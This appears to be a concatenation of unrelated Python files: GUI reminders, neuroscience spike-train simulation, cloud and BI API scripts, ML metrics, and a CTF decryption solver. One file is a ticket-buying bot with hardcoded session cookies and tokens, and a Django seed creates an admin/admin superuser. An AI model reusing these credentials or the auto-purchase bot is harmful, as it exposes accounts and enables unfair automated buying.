self.fieldRow3.pack()
# button frame (inside main frame) config
self.buttonRow = Frame(self.mainFrame, padx=10, pady=10)
self.btn1 = Button(self.buttonRow, text="Save", command=self.saveReminder).grid(row=0, column=0)
self.btn2 = Button(self.buttonRow, text="Cancel", command=self.cancelReminder).grid(row=0, column=2)
self.buttonRow.grid_columnconfigure(1, minsize=10)
self.buttonRow.pack()
# call mainloop of Tk object
self.root.mainloop()
def saveReminder(self):
'''
utility function to save reminder
'''
#reminder = self.rem.get().strip()
# hrs1 = int(self.hrs1.get().strip())
# mins1 = int(self.mins1.get().strip())
# clk1 = self.clk1.get()
# mins2 = int(self.mins2.get().strip())
# clk2 = self.clk2.get()
# if clk2 == 'PM':
# hrs2 += 12
#
#hrs1, mins1,hrs2,mins2,
minsfrequency = int(self.minsfrequency.get().strip())
# update list of reminders
with open(REM_FILE, 'r+') as f:
reminders = json.load(f)
f.seek(0)
reminders.append((minsfrequency,(t_now.hour*60*60+t_now.minute*60)))
f.write(json.dumps(reminders))
f.truncate()
self.root.destroy()
def cancelReminder(self):
'''
utility function to close window
'''
self.root.destroy()
if __name__ == "__main__":
REMINDER()
def center(win):
# Call all pending idle tasks - carry out geometry management and redraw widgets.
win.update_idletasks()
# Get width and height of the screen
width = win.winfo_width()
height = win.winfo_height()
# Calculate geometry
x = (win.winfo_screenwidth() // 2) - (width)
y = (win.winfo_screenheight() // 2) - (height)
# Set geometry
win.geometry('{}x{}+{}+{}'.format(220,270, 1050, 380))
def eye_action(win, more):
global execution_count
global root
print('Answer', more)
if more:
win.destroy()
sleep(snooze_time)
execution_count = execution_count + 1
EyeReminderWindow()
else:
win.destroy()
root.destroy()
def EyeReminderWindow():
#global image_num
global root
print('Execution', execution_count)
win = Toplevel()
center(win)
win.withdraw()
win.update_idletasks()
win.resizable(False,False)
win.deiconify()
win.title("IALrt")
win.iconbitmap("C:/Users/Arpit/Pictures/exercise.ico")
# width of the screen
# height of the screen
#ttk.Label(win,image=my_img1).grid(row=0,column=0)
message1='Time for a little break!'
#message2='Current Snooze time={0} seconds'.format(snooze_time)
#message3 = 'Do you want more reminders?'
i=execution_count % 5
ttk.Label(win, text=message1).grid(column=0, row=0)
ttk.Label(win,image=image_list[i]).grid(row=1,column=0,columnspan=2)
#ttk.Label(win, text=message2).grid(column=0, row=1)
#ttk.Label(win, text=message3).grid(column=0, row=2)
#Label(mainFrame, text="Take a break!!",
# font = font.Font(family="Times", size=12),
# padx=20, pady=10, wraplength=300)
#text.pack(fill=BOTH, expand=1)
#yes_btn = ttk.Button(win, text='Sure', command=lambda: eye_action(win, True))
#yes_btn.grid(column=0,row=3)
ttk.Button(win, text='Dismiss', command=lambda: eye_action(win, False)).grid(column=1, row=3)
#yes_btn.focus()
win.lift()
win.attributes('-topmost', True)
win.after(5000, lambda:eye_action(win, True))
#im1=Image.open("C:/Users/Arpit/Desktop/imagefolder/p1.png")
#im2=Image.open("C:/Users/Arpit/Desktop/imagefolder/p2.png")
#im3=Image.open("C:/Users/Arpit/Desktop/imagefolder/p3.png")
#im4=Image.open("C:/Users/Arpit/Desktop/imagefolder/p4.png")
#im5=Image.open("C:/Users/Arpit/Desktop/imagefolder/p5.png")
#im6=Image.open("C:/Users/Arpit/Desktop/imagefolder/p6.png")
# list of reminders
with open(REM_FILE, 'r') as f:
updated_reminders = json.loads(f.read())
for ab in updated_reminders:
if ab not in a:
a.append(ab)
#print('\n\nThanks! You will get your first reminder in {0} seconds'.format(snooze_time))
t_pom = ab[0] *60 #ab[4]
snooze_time=t_pom
# current hour and minute
cur_hrs = int(t_pom/3600)
minutes=t_pom-cur_hrs*60*60
cur_mins = int(minutes/60)
# find reminders to show
#for ab in a:
# rem_hrs = dt.datetime.now().hour
# rem_mins = dt.datetime.now().minute
# if cur_hrs == rem_hrs and cur_mins == rem_mins:
# show reminder window
# REMINDER(a)
root = Tk()
root.withdraw()
execution_count = 0
#image_num=-1
my_img1=ImageTk.PhotoImage(Image.open("C:/Users/Arpit/Desktop/imagefolder/p1.png"))
my_img2=ImageTk.PhotoImage(Image.open("C:/Users/Arpit/Desktop/imagefolder/p2.png"))
my_img3=ImageTk.PhotoImage(Image.open("C:/Users/Arpit/Desktop/imagefolder/p3.png"))
my_img4=ImageTk.PhotoImage(Image.open("C:/Users/Arpit/Desktop/imagefolder/p4.png"))
my_img5=ImageTk.PhotoImage(Image.open("C:/Users/Arpit/Desktop/imagefolder/p5.png"))
my_img6=ImageTk.PhotoImage(Image.open("C:/Users/Arpit/Desktop/imagefolder/p6.png"))
image_list=[my_img1,my_img2,my_img3,my_img4,my_img5,my_img6]
#if dt.datetime.now().hour<ab[2] and dt.datetime.now().minute<ab[3]:
# if dt.datetime.now().hour>ab[0] and dt.datetime.now().minute>ab[1]:
EyeReminderWindow()
#my_label=Label(image=my_img1)
#my_label.grid(row=2,column=2,columnspan=3)
root.mainloop()
print('Exiting, bye')
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 7 13:25:55 2019
@author: kblackw1
"""
import numpy as np
import spike_train_utils as stu
import sig_filter as filt
from matplotlib import pyplot as plt
ms_per_sec=1000
numbins=100 #number of bins for histogram
binwidth=0.002 #adjust so histogram looks good
########################### parameters related to spike train generation
max_time=5 #sec #20
min_isi=0.002
#these should go in dictionary?
ramp_start=2
ramp_duration=0.5 #fast ~0.3, slow ~0.5
pulse_start=[2,2.2]
pulse_duration=0.10
save_spikes={'Ctx': ['exp','osc'], 'STN': ['pulse']}
save_spikes={'STN': ['pulse']}
#save_spikes={} #if empty, will not save data
cell_type_dict={}
#isi, interburst and intraburst units are seconds
#interburst: interval between bursts; 1/interburst is frequency used for sinusoidally varying spike trains
#freq_dependence is fraction of mean_isi modulated sinusoidally, [0,1.0), but > 0.9 doesn't work with min_isi=2 ms
#noise used in burst train generation
#cell_type_dict['str']={'num_cells':100,'mean_isi': 1.0/4.1,'interburst': 1/0.2,'intraburst': 0.19,'noise':0.005,'freq_dependence':0.95}
#cell_type_dict['GPe']={'num_cells':35,'mean_isi': 1/29.3,'interburst': 0.5,'intraburst': 0.027,'noise':0.005,'freq_dependence':0.95}
cell_type_dict['STN']={'num_cells':500,'mean_isi': 1,'interburst': 1.5,'intraburst': 0.025,'noise':0.005,'freq_dependence':0.95,'max_freq':56}
#cell_type_dict['Ctx']={'num_cells':10000,'mean_isi': 1/5.,'interburst': 1.5,'intraburst': 0.044,'noise':0.005,'freq_dependence':0.95,'max_freq':30}
#using intraburst of 0.015 gives mean isi too small and mean freq too high!
#cell_type_dict['GPe']={'num_cells':35,'mean_isi': 1/29.3,'interburst': 1/20.,'intraburst': 0.015,'noise':0.005,'freq_dependence':0.5}
#cell_type_dict['STN']={'num_cells':200,'mean_isi': 1/18.,'interburst': 1/20.,'intraburst': 0.015,'noise':0.005,'freq_dependence':0.5}
########### Burst gives different number of spikes. What is relation among mean isi,interburst and intraburst
#to produce similar number of spikes for burst, need intraburst=0.8/freq
#theta frequencies for creating doubly oscillatory trains
DMfreq=10.5 #carrier,interburst=0.555Hz
DLfreq=5.0 #carrier,interburst=0.2Hz
thetafreq=0#DLfreq
#str values:
#mean_isi of 1/2.1 from?
#intratrain isi from KitaFrontSynapticNeurosci5-42
#intraburst: 0.01 is mode from KitaFrontSynapticNeurosci5-42, 0.02 is fastest observed str firing frequency,
#GPe values:
#mean_isi from KitaFrontSynapticNeurosci5-42
#interburst is guestimate; intraburst is mode from KitaFrontSynapticNeurosci5-42
#STN values:
#mean_isi from WilsonNeurosci198-54, mean freq is 18-28
#intraburst: same as GPe until find better estimate
#str interburst of 4.6 sec gives ~0.22 Hz, STN interburst of 1.5 --> 0.66 Hz, GPe interburst of 0.5 sec --> 2 Hz
#which method I think is better
best_method={'str': 'exp', 'GPe':'lognorm','STN':'lognorm','Ctx':'exp'}
for cell_type,params in cell_type_dict.items():
info={} #dictionary for storing min,max,mean of ISI and CV
ISI={}; hists={}
spikes={}
time_samp={};tdep_rate={} #for Inhomogenous Poisson methods
print ('##################',cell_type,'#################')
#spikesPoisson, info['poisson'],ISI['poisson']=stu.spikes_poisson(params['num_cells'],params['mean_isi'],min_isi,max_time)
#spikesNormal, info['norm'],ISI['norm']=stu.spikes_normal(params['num_cells'],params['mean_isi'],min_isi,max_time)
spikes['exp'], info['exp'],ISI['exp']=stu.spikes_exp(params['num_cells'],params['mean_isi'],min_isi,max_time)
spikes['lognorm'], info['lognorm'],ISI['lognorm']=stu.spikes_lognorm(params['num_cells'],params['mean_isi'],min_isi,max_time,params['intraburst'])
'''spikes['Burst']=[sorted(np.hstack(stu.train(cell,params['mean_isi'],float(max_time)/params['num_cells'],params['intraburst'],min_isi,max_time,params['noise'])))
for cell in range(params['num_cells'])]
ISI['burst'],CV_burst,info['burst']=stu.summary(spikesBurst,max_time,'burst')
spikes['Burst2']=[sorted(np.hstack(stu.train(cell,params['mean_isi'],params['interburst'],params['intraburst'],min_isi,max_time,params['noise'])))
for cell in range(params['num_cells'])]
ISI['burst2'],CV_burst2,info['burst2']=stu.summary(spikesBurst2,max_time,method='burst2')
'''
spikes['osc'],info['osc'],ISI['osc'],time_samp['osc'],tdep_rate['osc']=stu.osc(params['num_cells'],params['mean_isi'],min_isi,max_time,params['intraburst'],params['interburst'],params['freq_dependence'])
spikes['ramp'],info['ramp'],ISI['ramp'],time_samp['ramp'],tdep_rate['ramp']=stu.spikes_ramp(params['num_cells'],min_isi,max_time,1/params['mean_isi'],params['max_freq'],ramp_start,ramp_duration)
spikes['pulse'],info['pulse'],ISI['pulse'],time_samp['pulse'],tdep_rate['pulse']=stu.spikes_pulse(params['num_cells'],min_isi,max_time,1/params['mean_isi'],params['max_freq'],pulse_start,pulse_duration)
#
####################################################################
###### Plotting and output
####################################################################
#
if len(save_spikes):
for method in save_spikes[cell_type]:
fname=cell_type+str(cell_type_dict[cell_type]['num_cells'])+'_'+method+'_freq'+str(np.round(1/params['mean_isi']))
if method=='osc':
fname=fname+'_osc'+str(np.round(1.0/params['interburst'],1))
if thetafreq:
fname=fname+'_theta'+str(np.round(thetafreq))
if method=='ramp':
fname=fname+'_'+str(params['max_freq'])+'dur'+str(ramp_duration)
if method=='pulse':
fname=fname+'_'+str(params['max_freq'])+'dur'+str(pulse_duration)
print('saving data to', fname)
np.savez(fname+'.npz', spikeTime=spikes[method], info=info[method])
else:
################# histogram of ISIs ########################3
min_max=[np.min([info[key]['min'] for key in info.keys()]),
np.max([info[key]['max'] for key in info.keys()])]
bins=10 ** np.linspace(np.log10(min_max[0]), np.log10(min_max[1]), numbins)
bins_IP={};hist_dt={};time_hist={}
for ip_type in tdep_rate.keys():
bins_IP[ip_type]=list(time_samp[ip_type])+[max_time]
hist_dt[ip_type]=np.diff(time_samp[ip_type])[0]
for method in spikes.keys():
hists[method],tmp=np.histogram(stu.flatten(ISI[method]),bins=bins,range=min_max)
#recalculate histogram for inhomogeneous Poisson
for ip_type in tdep_rate.keys():
time_hist[ip_type],tmp=np.histogram(stu.flatten(spikes[ip_type]),bins=bins_IP[ip_type])
#
########## plot Inhomogeneous Poisson, and also fft
###### Extract low frequency envelope of signal, only if theta
for ip_type in tdep_rate.keys():
plot_bins=[(bins_IP[ip_type][i]+bins_IP[ip_type][i+1])/2 for i in range(len(bins_IP[ip_type])-1)]
plt.ion()
plt.figure()
plt.title(cell_type+' time histogram of '+ ip_type)
plt.bar(plot_bins,time_hist[ip_type],width=hist_dt[ip_type],label='hist')
plt.plot(time_samp[ip_type],np.max(time_hist[ip_type])*tdep_rate[ip_type]/np.max(tdep_rate[ip_type]),'r',label='tdep_rate')
if thetafreq and ip_type=='osc':
data=time_hist['osc']#tdep_rate
meandata=np.mean(data)
newdata=np.abs(data-meandata)
fft_env=np.fft.rfft(newdata)
cutoff=3
fft_lowpas=filt.butter_lowpass_filter(fft_env, cutoff, 1/time_samp[1], order=6)
plt.plot(time_samp[ip_type],newdata,'k',label='norm hist')
plt.xlabel('time (sec)')
plt.ylabel('num spikes')
plt.legend()
if ip_type=='osc':
#plot FFT of histogram
plt.figure()
plt.title(cell_type+' fft of time histogram of IP: '+ip_type)
fft_IP=np.fft.rfft(time_hist[ip_type])
xf = np.linspace(0.0, 1.0/(2.0*bins_IP[ip_type][1]), len(fft_IP))
plt.plot(xf[1:],2/len(fft_IP)*np.abs(fft_IP[1:]),label='fft')
if thetafreq:
plt.plot(xf[1:],2/len(fft_lowpas)*np.abs(fft_lowpas[1:]),label='lowpass')
plt.legend()
######### plot raster and histogram for other spike trains
colors=plt.get_cmap('viridis')
#colors=plt.get_cmap('gist_heat')
color_num=[int(cellnum*(colors.N/params['num_cells'])) for cellnum in range(params['num_cells'])]
color_set=np.array([colors.__call__(color) for color in color_num])
for labl,spike_set in spikes.items():
plt.figure()
plt.title(cell_type+' '+labl+' raster'+' mean '+str(np.round(info[labl]['mean'],3))+', median '+str(np.round(info[labl]['median'],3)))
#for i in range(params['num_cells']):
plt.eventplot(spike_set,color=color_set)#[i],lineoffsets=i)
plt.xlim([0,max_time])
plt.xlabel('Time (sec)')
plt.ylabel('neuron')
#
#plt.figure()
#plt.title('histogram')
color_num=[int(histnum*(colors.N/len(hists))) for histnum in range(len(hists))]
plot_bins=[(bins[i]+bins[i+1])/2 for i in range(len(bins)-1)]
flat_hist=stu.flatten([hists[labl] for labl in spikes.keys()])
ymax=np.max(flat_hist)
ymax=np.mean(flat_hist)+1*np.std(flat_hist)
xmax=5*np.max([info[t]['median'] for t in spikes.keys()])
plt.figure()
plt.title(cell_type+' '+' histogram')
for i,labl in enumerate(spikes.keys()):
plt.bar(np.array(plot_bins)+binwidth*0.1*i,hists[labl], label=labl+' '+str(np.round(1/info[labl]['mean'],1))+' hz '+str(np.round(1/info[labl]['median'],1))+' hz',color=colors.__call__(color_num[i]),width=binwidth)
plt.xlim([0,xmax])
#plt.ylim([0,ymax])
plt.xlabel('ISI')
plt.ylabel('num events')
#plt.xticks(plot_bins)
#plt.xscale('log')
plt.legend()
|
from distribution_pty.exponential import expon
from distribution_pty.lognormal import lognorm
from distribution_pty.pareto import pareto
from distribution_pty.gpd import genpareto |
# -*- coding: utf-8 -*-
import urllib,urllib2
import json
import time,datetime
def check_ticket(myurl,myheaders):
check_req = urllib2.Request(myurl,headers=myheaders)
check_response = urllib2.urlopen(check_req)
check_html = check_response.read()
return check_html
def buy_ticket(myurl,mydata,myheaders):
buy_req = urllib2.Request(myurl,data=urllib.urlencode(mydata),headers=myheaders)
buy_response = urllib2.urlopen(buy_req)
buy_html = buy_response.read()
return buy_html
def display_datetime():
now = datetime.datetime.now()
return now.strftime('%Y-%m-%d %H:%M:%S')
#Custom Params
ticket_id = input("Input ticket id:\n")
#seat_type:VIP[2] 普票[3] 站票[4]
seat_type = input("Input ticket type:\n")
brand_id = '1'
#cookie = 'route=72b22cfe13b6559dd934c0716c55a35b; .AspNet.ApplicationCookie=bF0E6lzNJh37oX6M2Lwe-zjSUUtm21L7QXJPM8ikLCUihaZ0aK2XRDQJJrmVTyM6PI1yq76UkSjWY_tSqID1_PCl96O9kcNJUQTbcDo67buFZNO_eL1jItDcL9njlc8mwqh-Sul-Ixq38fjV0UEm74wObQNqxoC03M9YKCIjj7Fz5sKb7m48donx3MoMkmsxxiUoVzN1pzPSK1_eRf2DXmXzsRoVWIcI_CJVpZFwvZpKAMJmUeH1wodnuBBywleYPFfgMs41GrPCznoeNXnDW9Y8CYjcaokApyJdoIiaOlPUdewfnC1u__4A4Y5EBSRN_wTzXNec1Arz43OtSTledSmxabSNAoYbv1qgVaZmITlM5nGUu3ypvVDb5Ah6xvBOReC9WZ3foK8vaVql0_xvyYVhDNsxdPexeXCrmmQzIT5rw2RX3EH4UPqYpFFP-Klde0LON48Q5tzxokWlsjUXpSBqXQ-W9x_yy3wIGvKSoFpYoziU08UYkZL_Qn4b8Fv8i1gmhKeqhUTIfkHZ8tALiGvNCcc3NYIExUR4aR8Xvw4; __RequestVerificationToken=fD722Rj85TcflM2_8L7ZGlKIzJcWHKUlGRGMjbanzM0L5jAFd_7ZbAex8hwlzFIcQXgSxay5tKeF0ruPqOa6Z_wiQUASb2eDKveraHquTdM1'
cookie = 'route=72b22cfe13b6559dd934c0716c55a35b; __RequestVerificationToken=NlPT3xclFnRPjvvaA3H69tDT9QCW3iLXB5r7FnSzqwdbQ--GGMAsL4eQsoSspntlekJL3tV9qUIfjIuNKatRHhlOgHeLQV6gX-XQW0BIJDM1; .AspNet.ApplicationCookie=dgQ9YiHYDQg5mEsuVFTviIbD_pWilSo8jBVU_AzB6q4Yr-wB4ShkpTPgXUVeFsI76AO_q_N3mNs5PZbDBNQ3dQSLJL-Ss-0orptD-RZ_7AMA_DE61Jp7I4EsJN1s5pA7rBHak-39Unt6aga04bfJsneYyFgneD_c9k0MIMCC1iDtC1HKqMxXSuLuDfr5XbpJAcK-IIcvONbR_1UsvPY_Zig9AQiCZTTLern4DpOgbqy4wAfFHfrjutgKocqa9Rm5XKuWJ3J00jFh-l4HhI46Jac-gYQjJdu1h9ZCIWAo_sTwJ4muja1QRxiMPSx8OF71WZgVntASpZ4qxKqIXIzfTAnJcsiNFJnirIlGhf6edz7K0bDY8XoPudBZgO_G9YXv3ilGIfwHt4Uthg0N_frdx6bqRuuvK8_MW9mGHF41HeT0f3QGfenwJgEnKXxeQrb32rwhVX4WN6ZONS34iX06GVdRu8-ZlpFW1nXdNDVGtWO2NpzsatB-MHBYSBPi_x6kakj7Oy9G-TPosjP6qIl0AaMijO-QTAPypDo_k33m2BGnM3VYzAFD6RV0FYOxR8NMQTi613QakYV8cw_EPDjCt2czite0Ti2xytD_iyVXXqZiDUbunLRBRahqTIZYEFZI'
#Define Params
checkid_url = 'http://shop.48.cn/home/GetUserWarnOnSale'
check_url = 'http://shop.48.cn/tickets/saleList?id=' + str(ticket_id) + '&brand_id=' + brand_id
send_headers = {
'Cookie':cookie,
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36'
}
buy_url = 'http://shop.48.cn/TOrder/add'
buy_data = { 'id':str(ticket_id),'num':'1','seattype':str(seat_type),'brand_id':brand_id }
ticket_index = seat_type - 1
#Check ID
print check_ticket(checkid_url,send_headers)
#Check&Buy
while True:
check_html = check_ticket(check_url,send_headers)
check_jsondata = json.loads(check_html)
if check_jsondata[ticket_index]['amount'] == 1:
buy_html = buy_ticket(buy_url,buy_data,send_headers)
print display_datetime() + ' Result:Tickets Buy Done; Tickets Amount ' + str(check_jsondata[ticket_index]['amount'])
print buy_html
break
else:
print display_datetime() + ' Result:Tickets Amount '+ str(check_jsondata[ticket_index]['amount'])
#print check_jsondata[ticket_index]
time.sleep(1)
|
from pygame.sound import *
echo.test_echo()
|
import sys
from pprint import pprint
import logging
import keyring
from microstrategy_api.task_proc.document import Document
from microstrategy_api.task_proc.task_proc import TaskProc
base_url = 'https://my_hostname/MicroStrategy/asp/TaskProc.aspx?'
def run_document(task_api_client, document_guid, prompt_answers_by_attr=None):
log = logging.getLogger(__name__+'.run_document')
log.setLevel(logging.DEBUG)
doc = Document(task_api_client, guid=document_guid)
prompts = doc.get_prompts()
log.info("prompts:")
log.info(prompts)
doc = Document(task_api_client, guid=document_guid)
prompts = doc.get_prompts()
log.info("prompts:")
log.info(prompts)
prompt_answers = dict()
if prompt_answers_by_attr is not None:
for prompt in prompts:
if prompt.attribute.guid in prompt_answers_by_attr:
prompt_answers[prompt] = prompt_answers_by_attr[prompt.attribute.guid]
log.debug("Prompt {} answer = {}".format(prompt, prompt_answers_by_attr[prompt.attribute.guid]))
else:
prompt_answers[prompt] = []
log.debug("Prompt {} answer = None".format(prompt))
results = doc.execute(element_prompt_answers=prompt_answers)
log.info("Document Done")
return results
if __name__ == '__main__':
logging.basicConfig()
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
user_name = 'Administrator'
password = keyring.get_password('Development', user_name)
server = 'my_server'
project_name = 'my_project'
OU_GUID = '7039371C4B5CC07DC6682D9C0EC8F45C'
task_api_client = TaskProc(
base_url=base_url,
server=server,
project_name=project_name,
username=user_name,
password=password,
)
results = run_document(
task_api_client,
# document_guid='6AF9511C4AB4A76635DBEDB98E3859D8',
document_guid='084536174A598B380CD33684232BB59C',
prompt_answers_by_attr={OU_GUID: ['FETQ6OmnsKB']},
)
log.debug(pprint(results))
log.info("Logging out")
task_api_client.logout()
|
#!/usr/bin/python
'''
Implemented by Aaditya Purani (@aaditya_purani)
There are three functions calling each both are encryption routine.
First function has in-memory array written in inline assembly
In zMx function, it takes plain-text as input checks block.number == 12
Encryption routine in zMx utilizes it and performs calculation along with memory arr
Output is passed to Crp function, which has custom rot-19 implementation
then it is feeded into aXeJ which takes input as bytes and perform require check with seed owner sets
As this is static bytecode, seed cannot be retrieved from bytecode. So we want players to brute seed given sha1 hash & requirements
seed should be exactly 4 length which is given out in one require(bytes(seed).length == 4); checks
Then implement xor checks for aXeJ function
Now, to decrypt implement in reverse given below
'''
cipher = "tphzqh}v}uivyznwju" # Provided in message.txt
len_cipher = len(cipher)
offset = len_cipher - 2
cipher = list(cipher)
seed = "bcmz" # Must be retrieved by bruteforce of SHA-1 Hash provided in bytecode 4d64752cadde6ea019757e09ce374aa1bdba81df
cipher[offset] = chr(ord(seed[0]) ^ ord(cipher[offset])^ ord(cipher[offset-2]))
cipher[offset-4] = chr(ord(seed[2]) ^ ord(cipher[offset-4]) ^ ord(cipher[offset-8]))
arr_num = [2, 24, 13, 17,8, 9, 10, 5, 3, 7] # Must be retrieved carefully from memory array
blk_num = 12
for i in xrange(0, len_cipher):
cipher[i] = chr((ord(cipher[i])^arr_num[(i+3)%10])^(12))
print "".join(cipher)
# Use the rotcustom.sol to decrypt it further |
# -*- coding: utf-8 -*-
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import *
import datetime, os
current_db_rev = 4
Base = declarative_base()
class Record(Base):
__tablename__ = 'records'
id = Column( Integer, primary_key=True,index=True )
date = Column( DateTime )
description = Column( Text )
filename = Column( String(255) )
def __init__(self):
self.date = datetime.datetime.now()
def basename(self):
return os.path.basename( self.filename )
class InfoLog(Base):
__tablename__ = 'infologs'
id = Column( Integer, primary_key=True,index=True )
spring_version = Column( String(100) )
record_id = Column( Integer, ForeignKey( Record.id ) )
#and so forth
class DbConfig(Base):
__tablename__ = 'config'
dbrevision = Column( Integer, primary_key=True )
def __init__(self):
self.dbrevision = 1
class ElementExistsException( Exception ):
def __init__(self, element):
self.element = element
def __str__(self):
return "Element %s already exists in db"%(self.element)
class ElementNotFoundException( Exception ):
def __init__(self, element):
self.element = element
def __str__(self):
return "Element %s not found in db"%(self.element)
class DbConnectionLostException( Exception ):
def __init__( self, trace ):
self.trace = trace
def __str__(self):
return "Database connection temporarily lost during query"
def getTrace(self):
return self.trace
class Backend:
def Connect(self):
self.engine = create_engine(self.alchemy_uri, echo=self.verbose)
self.metadata = Base.metadata
self.metadata.bind = self.engine
self.metadata.create_all(self.engine)
self.sessionmaker = sessionmaker( bind=self.engine )
def __init__(self,alchemy_uri,verbose=False):
global current_db_rev
self.alchemy_uri = alchemy_uri
self.verbose = verbose
self.Connect()
oldrev = self.GetDBRevision()
self.UpdateDBScheme( oldrev, current_db_rev )
self.SetDBRevision( current_db_rev )
def UpdateDBScheme( self, oldrev, current_db_rev ):
pass
def GetDBRevision(self):
session = self.sessionmaker()
rev = session.query( DbConfig.dbrevision ).order_by( DbConfig.dbrevision.desc() ).first()
if not rev:
#default value
rev = -1
else:
rev = rev[0]
session.close()
return rev
def SetDBRevision(self,rev):
session = self.sessionmaker()
conf = session.query( DbConfig ).first()
if not conf:
#default value
conf = DbConfig()
conf.dbrevision = rev
session.add( conf )
session.commit()
session.close()
def parseZipMembers(self, fn, fd_dict ):
session = self.sessionmaker()
record = Record()
record.filename = fn
session.add( record )
session.commit()
record_id = record.id
infolog = InfoLog()
infolog.record_id = record_id
#for line in line_list:
#if line.startswith('Spring'):
#infolog.spring_version = line.replace('Spring','')
#print line
#insert actual parsing here
#
session.add( infolog )
session.commit()
session.close()
print 'koko'
return record_id |
import pygame
class Penguin():
def __init__(self, screen):
"""Initiliaze the Penguin and the screen"""
self.screen = screen
#Load the ship image and get its rect.
self.image = pygame.image.load('images/penguin1.bmp') #importing the image
self.rect = self.image.get_rect() #rect == game object's position/coords
self.screen_rect = screen.get_rect() #this is the entire screen's coords
#Start each new ship at the center of the screen.
self.rect.centerx = self.screen_rect.centerx
self.rect.centery = self.screen_rect.centery
def blitme(self):
"""Draw the ship at its current location."""
#draws onto screen arg1 with coords arg2
self.screen.blit(self.image, self.rect) |
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from artists.models import Artist, Song
from django.contrib.auth.models import User
class Command(BaseCommand):
help = 'Imports initial data'
def handle(self, *args, **options):
User.objects.all().delete()
Artist.objects.all().delete()
Song.objects.all().delete()
User.objects.create_superuser(
username='admin', email='admin@example.com', password='admin')
ARTISTS = [
('Stevland', 'Judkins', 'Stevie Wonders', 'https://upload.wikimedia.org/wikipedia/commons/thumb/5/54/Stevie_Wonder_1973.JPG/600px-Stevie_Wonder_1973.JPG', 90, 'rock'),
('James', 'Hendrix', 'Jimi Hendrix', 'https://upload.wikimedia.org/wikipedia/commons/a/ae/Jimi_Hendrix_1967.png', 80, 'rock'),
('Riley', 'King', 'B.B. King', 'https://upload.wikimedia.org/wikipedia/commons/thumb/9/97/B.B._King_in_2009.jpg/600px-B.B._King_in_2009.jpg', 75, 'blues'),
]
artists_ids = []
for first_name, last_name, artistic_name, picture_url, popularity, genre in ARTISTS:
artist = Artist.objects.create(
first_name=first_name,
last_name=last_name,
artistic_name=artistic_name,
picture_url=picture_url,
popularity=popularity,
genre=genre
)
artists_ids.append(artist.id)
SONGS = [
(artists_ids[0], 'Superstition', 'Talking book'),
(artists_ids[0], 'Higher Ground', 'Innervisions'),
(artists_ids[2], 'The Thrill Is Gone', 'Completely Well'),
]
for artist_id, title, album_name in SONGS:
Song.objects.create(
artist_id=artist_id,
title=title,
album_name=album_name
)
print('Imported!')
|
#!/usr/bin/python2.7
#-*- coding: utf-8 -*-
import numpy as np
import math
import operator
A = 8.21985303
s = 1
r_21 = 1.126315789
r_32 = 1.39953271
epsilon = 1e-10
p1 = 1.0
for i in range(1,1000):
p2 = A + math.log10((r_21**p1-s)/(r_32**p1-s))
print 'p2:',p2
if abs(p1-p2)<=epsilon:
print 'solution is done. p=',p2
print 'iteration number i=',i
break
p1 = p2
|
import boto3
import json
def get_mq_info():
"""
Function to get Amazon mq broker data
"""
# choosing ec2 to get region info
conn = boto3.client('ec2')
regions = [region['RegionName'] for region in conn.describe_regions()['Regions']]
broker_info = []
# looping through regions
for region in regions:
if region == 'eu-north-1' or region == 'sa-east-1':
continue
client = boto3.client('mq', region_name=region)
# listing brokers to get broker name for describe
response = client.list_brokers()['BrokerSummaries']
broker_names = []
for res in response:
broker_names.append(res['BrokerId'])
for name in broker_names:
# Describing each broker
response = client.describe_broker(
BrokerId=name
)
req_info = []
req_info.append(response)
# appending to seperate list to get seperated broker info
broker_info.append(req_info)
# getting the final dictionary
dict_broker = {"Brokers": broker_info}
# convert to json
json_broker = json.dumps(dict_broker, indent=4, default=str)
print(json_broker)
get_mq_info()
|
import numpy
import cv2
#Determine source video
cap = cv2.VideoCapture("CelesteVideos/Level1.mp4")
frame_width = int(cap.get(3) / 2)
frame_height = int(cap.get(4) / 2)
#Output file creation
out = cv2.VideoWriter('CelesteVideos/edgeDetection.mp4',cv2.VideoWriter_fourcc('M','P','4','V'), 30, (frame_width,frame_height), False)
while(cap.isOpened()):
#ret is a boolean of if a frame was successfully captured
ret, frame = cap.read()
#frameTaken = (frameTaken + 1) % FRAMEGAP
if (ret): #and frameTaken == 0:
frame = cv2.pyrDown(frame)
#Edge detection test
edges = cv2.Canny(frame, 200, 450)
"""
width = int(edges.shape[1] * scale_percent / 100)
height = int(edges.shape[0] * scale_percent / 100)
dim = (width, height)
# resize image
resized_edges = cv2.resize(edges, dim, interpolation = cv2.INTER_AREA)
"""
out.write(edges)
#cv2.imshow('Canny edge detection', edges)
#Break if capture ends.
else:
break
#Break if q is pressed
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
out.release()
cv2.destroyAllWindows() |
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score
import numpy as np
import pandas as pd
'''multiclass classification'''
y_true = np.array([2,0,2,2,0,1])
y_pred = np.array([0,0,2,2,0,1])
accuracy_score(y_true, y_pred)
recall_score(y_true, y_pred, average='micro')
recall_score(y_true, y_pred, average='macro')
recall_score(y_true, y_pred, average='weighted')
recall_score(y_true, y_pred, labels=[2], average=None) #2에 대한 recall. 2가 pos,나머지는 neg
recall_score(y_true, y_pred, labels=[0,1,2], average=None)
from sklearn.metrics import classification_report, confusion_matrix
print(classification_report(y_true, y_pred))
confusion_matrix(y_true, y_pred) #각각의 행이 class를 뜻하고, 행의 열이 각각의 클러스터로 분류된 것의 갯수를 의미한다
'''binary classification
종류가 두가지 뿐이더라도, 0과 1이 아니면 multicalss로 생각된다
'''
y_true2 = np.array([0,2,2,2,0,2])
y_pred2 = np.array([0,0,2,2,2,2])
recall_score(y_true2, y_pred2, pos_label = 2)
#pos_label을 설정해서 2가 맞을경우, 2가 아닐경우 로 binary화 함
'''real dataset'''
data = pd.read_csv('https://drive.google.com/uc?export=download&id=1Bs6z1GSoPo2ZPr5jL2qDjRghYcMUOHbS')
data['target'] = (data['quality']>=7)*1
data['target'].sum()/len(data) #inbalanced data set
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
